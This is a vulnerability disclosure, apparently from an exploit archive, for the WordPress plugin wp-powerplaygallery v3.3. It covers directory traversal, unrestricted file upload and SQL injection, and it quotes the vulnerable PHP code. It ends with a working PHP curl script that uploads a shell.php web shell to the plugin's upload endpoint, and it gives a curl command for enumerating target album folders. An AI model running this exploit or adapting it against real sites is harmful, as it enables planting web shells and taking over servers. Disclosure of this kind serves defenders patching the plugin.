Title:Remote file upload vulnerability & Blind SQLi in wordpress plugin wp-powerplaygallery v3.31. Ability to create directories out side of the upload path by using ../: Lines 56-59 of upload.php: 56 // Create target dir 57 if (!file_exists($targetDir)) { 58 @mkdir($targetDir); 59 } 2. Arbitrary file uploads to a path in the web root directory: Lines 138-160 of uploads.php don’t verify what types of files are allowed or where they should be placed: 138 // Open temp file 139 if (!$out = @fopen("{$filePath}.part", $chunks ? "ab" : "wb")) { 140 die('{"jsonrpc" : "2.0", "error" : {"code": 102, "message": "Failed to open output stream."}, "id" : "id"}'); 141 } 142 143 if (!empty($_FILES)) { 144 if ($_FILES["file"]["error"] || !is_uploaded_file($_FILES["file"]["tmp_name"])) { 145 die('{"jsonrpc" : "2.0", "error" : {"code": 103, "message": "Failed to move uploaded file."} , "id" : "id"}'); 146 } 147 148 // Read binary input stream and append it to temp file 149 if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) { 150 die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}'); 151 } 152 } else { 153 if (!$in = @fopen("php://input", "rb")) { 154 die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}'); 155 } 156 } 157 158 while ($buff = fread($in, 4096)) { 159 fwrite($out, $buff); 160 } 3. Sql injection Lines 131-135 of upload.php fail to handle user input appropriately either by sanitizing or paramaterizing it. Injection points are any GET/POST to albumid or name. 131 $query = "INSERT INTO ".$wpdb->prefix."pp_images (`category_id`, `title`, `description`, `price`, `thumb`, ` image`, `status`, `order`, `creation_date` ) 132 VALUES (".$_REQUEST['albumid'].",'".$imgname[0]."','".$imgname[0]."','','".$resize."','".$_REQUEST ['name']."',1,'','NULL')"; 133 134 $wpdb->query($query); 135 <?php /*Remote shell upload exploit for wp-powerplaygallery v3.3 */ /*Larry W. Cashdollar @_larry0 6/27/2015 albumid needs to be a numeric value matching an existing album number, 1 is probably a good start but you can enumerate these by using curl, and looking for redirect 301 responses: e.g. $ curl http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big ->301 exists else 404 doesn't. shell is http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big/shell.php */ $target_url = 'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php'; $file_name_with_full_path = '/var/www/shell.php'; echo "POST to $target_url $file_name_with_full_path"; $post = array('albumid'=>'foo' , 'name' => 'shell.php','file'=>'@'.$file_name_with_full_path); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,$target_url); curl_setopt($ch, CURLOPT_POST,1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); $result=curl_exec ($ch); curl_close ($ch); echo "<hr>"; echo $result; echo "<hr>"; ?>